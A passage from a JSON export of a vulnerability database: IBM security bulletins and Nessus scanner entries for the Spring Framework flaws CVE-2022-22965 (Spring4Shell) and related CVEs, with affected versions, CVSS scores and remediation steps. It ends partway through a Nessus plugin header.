**11.0.2.13-WS-WatsonExplorer-AEAnalytical-IF001**.\n 3. To apply the fix, follow the steps below. \n\n 1. Stop all services if it is running \nesadmin stop\n 2. Navigate to <install_dir>/lib\n 3. 
Rename querymodifier.jar and es.indexservice.jar to querymodifier.jar.bak and es.indexservice.jar.bak\n 4. Copy the downloaded querymodifier.jar and es.indexservice.jar to <install_dir>/lib\n 5. Start all services \nesadmin start \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-22T11:43:07", "type": "ibm", "title": "Security Bulletin: Vulnerability exists for Spring Framework in Watson Explorer (CVE-2021-22060, CVE-2022-22965, CVE-2022-22950)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22060", "CVE-2022-22950", "CVE-2022-22965"], "modified": "2022-04-22T11:43:07", "id": "F426BDEEA0109CBE44C73C53461CE7144BDD04ADCF7EC044CE76723EAE672095", "href": "https://www.ibm.com/support/pages/node/6573715", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:32:09", "description": "## Summary\n\nThere are multiple vulnerabilities in Spring Framework (CVE-2022-22968, CVE-2022-22965, and CVE-2022-22950) as described in the vulnerability details section. 
Spring Framework v5.3.8 is used by Db2 Web Query for i for infrastructure support. IBM has addressed the vulnerabilities in Db2 Web Query for i by upgrading to Spring Framework v5.3.19. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22968](<https://vulners.com/cve/CVE-2022-22968>) \n** DESCRIPTION: **Spring Framework could provide weaker than expected security, caused by a data binding rules vulnerability in which the patterns for disallowedFields on a DataBinder are case sensitive. The case sensitivity allows that a field is insufficiently protected unless it is listed with both upper and lower case for the first character of the field. An attacker could exploit this vulnerability to launch further attacks on the system. \nCVSS Base score: 3.7 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/224374](<https://exchange.xforce.ibmcloud.com/vulnerabilities/224374>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Db2 Web Query for i| 2.3.0 \nIBM Db2 Web Query for i| 2.2.1 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerabilities now.**\n\nDb2 Web Query for i releases 2.2.1 and 2.3.0 are impacted. \n\n**Release 2.2.1 can be fixed by upgrading to release 2.3.0.**\n\nTo request an EZ-Install package, including instructions for the upgrade installation, send an email to QU2@us.ibm.com. More information for the upgrade is available at <https://ibm.biz/db2wq-install>. \n\n**Release 2.3.0 can be fixed by applying the latest Db2 Web Query for i group Program Temporary Fix (PTF).**\n\nThe PTFs are applied to product ID 5733WQX. 
The group PTF numbers and minimum level with the fix are:\n\n**Affected Releases**\n\n| \n\n**Group PTF and Minimum Level for Remediation** \n \n---|--- \n \nDb2 Web Query for i 2.3.0 w/ IBM i 7.5\n\n| \n\n[SF99671 level 6](<https://www.ibm.com/support/fixcentral/ibmi/quickorder?function=IBMiFixId&fixids=SF99671&includeSupersedes=0&source=fc> \"SF99671 level 6\" ) \n \nDb2 Web Query for i 2.3.0 w/ IBM i 7.4\n\n| \n\n[SF99654 level 6](<https://www.ibm.com/support/fixcentral/ibmi/quickorder?function=IBMiFixId&fixids=SF99654&includeSupersedes=0&source=fc>) \n \nDb2 Web Query for i 2.3.0 w/ IBM i 7.3\n\n| \n\n[SF99533 level 6](<https://www.ibm.com/support/fixcentral/ibmi/quickorder?function=IBMiFixId&fixids=SF99533&includeSupersedes=0&source=fc>) \n \n_**Important note:** \n__IBM recommends that all users running unsupported versions of affected products upgrade to supported and fixed version of affected products._\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-10T05:17:19", "type": "ibm", "title": "Security Bulletin: Due to use of Spring Framework, IBM Db2 Web Query for i is vulnerable to unprotected fields (CVE-2022-22968), remote code execution (CVE-2022-22965), and denial of service (CVE-2022-22950).", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", 
"baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950", "CVE-2022-22965", "CVE-2022-22968"], "modified": "2022-06-10T05:17:19", "id": "2FB703AAD3FC5C2BE7EED7EC7E69FEBE209E6C70177FEA76C552605DF83D85ED", "href": "https://www.ibm.com/support/pages/node/6593861", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:34:09", "description": "## Summary\n\nIBM Watson Discovery for IBM Cloud Pak for Data is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Spring is used for internal services. The fix includes Spring 5.3.18.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L) \n \n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2022-22963](<https://vulners.com/cve/CVE-2022-22963>) \n** DESCRIPTION: **VMware Spring Cloud Function could allow a remote attacker to execute arbitrary code on the system, caused by an error when using the routing functionality. By providing a specially crafted SpEL as a routing-expression, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223020](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223020>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nWatson Discovery| 4.0.0-4.0.7 \nWatson Discovery| 2.0.0-2.2.1 \n \n\n\n## Remediation/Fixes\n\nUpgrade to IBM Watson Discovery 4.0.8 \n\nUpgrade to IBM Watson Discovery 2.2.1 and apply cpd-watson-discovery-2.2.1-patch-10\n\n<https://cloud.ibm.com/docs/discovery-data?topic=discovery-data-install>\n\n<https://www.ibm.com/support/pages/available-patches-watson-discovery-ibm-cloud-pak-data>\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-27T14:54:28", "type": "ibm", "title": "Security Bulletin: IBM Watson Discovery for IBM Cloud Pak for Data is affected by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-27T14:54:28", "id": "370CF55655D0DCE5B827E549AA74D877B1D4BA2D531AAEFFDF0A6CA27218326F", "href": "https://www.ibm.com/support/pages/node/6570949", "cvss": {"score": 
7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:32:43", "description": "## Summary\n\nThere are multiple vulnerabilities in Spring Framework used by SPSS Collaboration and Deployment Services. SPSS Collaboration and Deployment Services is affected but not classified as vulnerable to these issues. The fix includes Spring 5.3.20.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L) \n \n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2022-22970](<https://vulners.com/cve/CVE-2022-22970>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by a flaw in the handling of file uploads. By sending a specially-crafted request, a remote authenticated attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/226491](<https://exchange.xforce.ibmcloud.com/vulnerabilities/226491>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2022-22968](<https://vulners.com/cve/CVE-2022-22968>) \n** DESCRIPTION: **Spring Framework could provide weaker than expected security, caused by a data binding rules vulnerability in which the patterns for disallowedFields on a DataBinder are case sensitive. The case sensitivity allows that a field is insufficiently protected unless it is listed with both upper and lower case for the first character of the field. An attacker could exploit this vulnerability to launch further attacks on the system. \nCVSS Base score: 3.7 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/224374](<https://exchange.xforce.ibmcloud.com/vulnerabilities/224374>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2022-22971](<https://vulners.com/cve/CVE-2022-22971>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by a flaw with a STOMP over WebSocket endpoint. By sending a specially-crafted request, a remote authenticated attacker could exploit this vulnerability to cause a denial of service condition. 
\nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/226492](<https://exchange.xforce.ibmcloud.com/vulnerabilities/226492>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nSPSS Collaboration and Deployment Services| 8.3 \nSPSS Collaboration and Deployment Services| 8.2.2 \nSPSS Collaboration and Deployment Services| 8.2.1 \nSPSS Collaboration and Deployment Services| 8.2 \nSPSS Collaboration and Deployment Services| 8.1.1 \nSPSS Collaboration and Deployment Services| 8.1 \nSPSS Collaboration and Deployment Services| 8.0 \n \n\n\n## Remediation/Fixes\n\nProduct | VRMF| Remediation/First Fix \n---|---|--- \nSPSS Collaboration and Deployment Services| 8.3.0.0| [8.3.0.0](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FSPSS+Collaboration+and+Deployment+Services&fixids=8.3.0.0-IM-SCaDS-IF008&source=SAR> \"8.3.0.0\" ) \nSPSS Collaboration and Deployment Services| 8.2.2.0| [8.2.2.0](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FSPSS+Collaboration+and+Deployment+Services&fixids=8.2.2.0-IM-SCaDS-IF009&source=SAR> \"8.2.2.0\" ) \nSPSS Collaboration and Deployment Services| 8.2.1.0| [8.2.1.0](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FSPSS+Collaboration+and+Deployment+Services&fixids=8.2.1.0-IM-SCaDS-IF007&source=SAR> \"8.2.1.0\" ) \nSPSS Collaboration and Deployment Services| 8.2.0.0| [8.2.0.0](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FSPSS+Collaboration+and+Deployment+Services&fixids=8.2.0.0-IM-SCaDS-IF007&source=SAR> \"8.2.0.0\" ) \nSPSS Collaboration and Deployment Services| 8.1.1.0 \n| 
[8.1.1.0](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FSPSS+Collaboration+and+Deployment+Services&fixids=8.1.1.0-IM-SCaDS-IF008&source=SAR> \"8.1.1.0\" ) \nSPSS Collaboration and Deployment Services| 8.1.0.0 \n| [8.1.0.0](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FSPSS+Collaboration+and+Deployment+Services&fixids=8.1.0.0-IM-SCaDS-IF009&source=SAR> \"8.1.0.0\" ) \nSPSS Collaboration and Deployment Services| 8.0.0.0 \n| [8.0.0.0](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FSPSS+Collaboration+and+Deployment+Services&fixids=8.0.0.0-IM-SCaDS-IF009&source=SAR> \"8.0.0.0\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-30T14:20:34", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in Spring Framework affect SPSS Collaboration and Deployment Services", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950", "CVE-2022-22965", "CVE-2022-22968", "CVE-2022-22970", "CVE-2022-22971"], 
"modified": "2022-05-30T14:20:34", "id": "C602AE40F6974D4EE4D596F81D007D4F74282F20DC8B4859AE08925E2CE79326", "href": "https://www.ibm.com/support/pages/node/6590869", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:32:19", "description": "## Summary\n\nVulnerabilities contained within 3rd party components were identified and remediated in the IBM MaaS360 Cloud Extender Agent, Mobile Enterprise Gateway and MaaS360 VPN module.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-22060](<https://vulners.com/cve/CVE-2021-22060>) \n** DESCRIPTION: **VMware Tanzu Spring Framework could allow a remote authenticated attacker to bypass security restrictions, caused by improper input validation. By sending a specially-crafted request, an attacker could exploit this vulnerability to insert additional log entries. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217183](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217183>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L) \n \n** CVEID: **[CVE-2022-0547](<https://vulners.com/cve/CVE-2022-0547>) \n** DESCRIPTION: **OpenVPN could allow a remote attacker to bypass security restrictions, caused by an authentication bypass vulnerability in external authentication plug-ins. 
By sending a specially-crafted request using multiple deferred authentication replies, an attacker could exploit this vulnerability to gain access with only partially correct credentials. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/222201](<https://exchange.xforce.ibmcloud.com/vulnerabilities/222201>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N) \n \n** CVEID: **[CVE-2022-0778](<https://vulners.com/cve/CVE-2022-0778>) \n** DESCRIPTION: **OpenSSL is vulnerable to a denial of service, caused by a flaw in the BN_mod_sqrt() function when parsing certificates. By using a specially-crafted certificate with invalid explicit curve parameters, a remote attacker could exploit this vulnerability to cause an infinite loop, and results in a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/221911](<https://exchange.xforce.ibmcloud.com/vulnerabilities/221911>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**\n\n| \n\n**Version(s)** \n \n---|--- \n \nIBM MaaS360 VPN Module\n\n| \n\n2.106.100 and prior \n \nIBM MaaS360 Mobile Enterprise Gateway\n\n| \n\n2.106.200 and prior \n \nIBM MaaS360 Cloud Extender Agent\n\n| \n\n2.106.100.008 and prior \n \n \n\n\n## Remediation/Fixes\n\nIBM encourages customers to update their systems promptly. \n\n1\\. Update the IBM MaaS360 Mobile Enterprise Gateway and the MaaS360 VPN Module to version 2.106.500 or higher. Instructions on how to upgrade the Mobile Enterprise Gateway and VPN Module are located on this IBM Documentation [page](<https://www.ibm.com/docs/en/maas360?topic=ice-upgrading-mobile-enterprise-gateway-meg-maas360-vpn-modules> \"page\" ).\n\n2\\. Update the IBM MaaS360 Cloud Extender to version 2.106.500.011 or greater. The latest Cloud Extender agent is available within the MaaS360 Administrator Portal. Instructions to upgrade the Agent are located on this IBM Documentation [page](<https://www.ibm.com/docs/en/maas360?topic=extender-upgrading-cloud> \"page\" ).\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-06T18:27:01", "type": "ibm", "title": "Security Bulletin: IBM MaaS360 Cloud Extender Agent, Mobile Enterprise Gateway and VPN module have multiple vulnerabilities (CVE-2021-22060, CVE-2022-22950, CVE-2022-0547, CVE-2022-0778, CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22060", "CVE-2022-0547", "CVE-2022-0778", "CVE-2022-22950", "CVE-2022-22965"], "modified": "2022-06-06T18:27:01", "id": "14108283F9157C4F2A38313CFBD3F47CFDC207CBE84809E04B7E197DA546B8D3", "href": "https://www.ibm.com/support/pages/node/6592807", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-09-27T15:18:38", "description": "The remote host contains a Spring Framework library version that is prior to 5.2.20 or 5.3.x prior to 5.3.18. It is, therefore, affected by a remote code execution vulnerability:\n - A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. 
However, the nature of the vulnerability is more general, and there may be other ways to exploit it.\n - These are the prerequisites for the exploit:\n - JDK 9 or higher\n - Apache Tomcat as the Servlet container\n - Packaged as WAR\n - spring-webmvc or spring-webflux dependency", "cvss3": {}, "published": "2022-04-06T00:00:00", "type": "nessus", "title": "Spring Framework Spring4Shell (CVE-2022-22965)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22965"], "modified": "2023-09-25T00:00:00", "cpe": ["cpe:/a:pivotal_software:spring_framework", "cpe:/a:vmware:spring_framework"], "id": "SPRING4SHELL.NBIN", "href": "https://www.tenable.com/plugins/nessus/159542", "sourceData": "Binary data spring4shell.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-03T19:12:05", "description": "The version of tomcat installed on the remote host is prior to 9.0.65-1. It is, therefore, affected by a vulnerability as referenced in the ALAS2TOMCAT9-2023-004 advisory.\n\n - A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. 
(CVE-2022-22965)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-09-27T00:00:00", "type": "nessus", "title": "Amazon Linux 2 : tomcat (ALASTOMCAT9-2023-004)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22965"], "modified": "2023-09-28T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:tomcat", "p-cpe:/a:amazon:linux:tomcat-admin-webapps", "p-cpe:/a:amazon:linux:tomcat-docs-webapp", "p-cpe:/a:amazon:linux:tomcat-el-3.0-api", "p-cpe:/a:amazon:linux:tomcat-jsp-2.3-api", "p-cpe:/a:amazon:linux:tomcat-jsvc", "p-cpe:/a:amazon:linux:tomcat-lib", "p-cpe:/a:amazon:linux:tomcat-servlet-4.0-api", "p-cpe:/a:amazon:linux:tomcat-webapps", "cpe:/o:amazon:linux:2"], "id": "AL2_ALASTOMCAT9-2023-004.NASL", "href": "https://www.tenable.com/plugins/nessus/182056", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2 Security Advisory ALASTOMCAT9-2023-004.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(182056);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/09/28\");\n\n script_cve_id(\"CVE-2022-22965\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/25\");\n\n script_name(english:\"Amazon Linux 2 : tomcat (ALASTOMCAT9-2023-004)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux 2 host is missing a security 